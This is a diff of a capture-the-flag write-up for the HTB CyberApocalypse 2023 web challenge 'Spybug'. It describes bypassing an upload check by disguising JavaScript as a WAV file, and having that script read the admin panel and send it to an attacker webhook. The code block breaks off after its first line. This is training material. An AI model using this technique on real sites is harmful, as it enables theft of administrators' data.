LazyTitan33/CTF-Writeups/HTB - CyberApocalypse_2023/Web/Spybug.md

 **Step 1**: Register a new agent to get identifier and token:
 ![image](https://user-images.githubusercontent.com/80063008/227710772-66c30cc6-9462-4a36-b512-1abcca1679a7.png)

 **Step 2**: Upload file with recording name in the form-data, .wav extension, audio/wave mimetype and the wav magic header anywhere in the file (it doesn't check for the magic bytes to be the first ones).
 I used // to comment it out in the javascript code so that javascript parsing won't error out.
-The javascript simply accessing the admin panel grabbing the response and sending it to our webhook.
+The javascript below is simply accessing the admin panel grabbing the response and sending it to our webhook.

 ```javascript
 var target = 'http://localhost:1337/panel';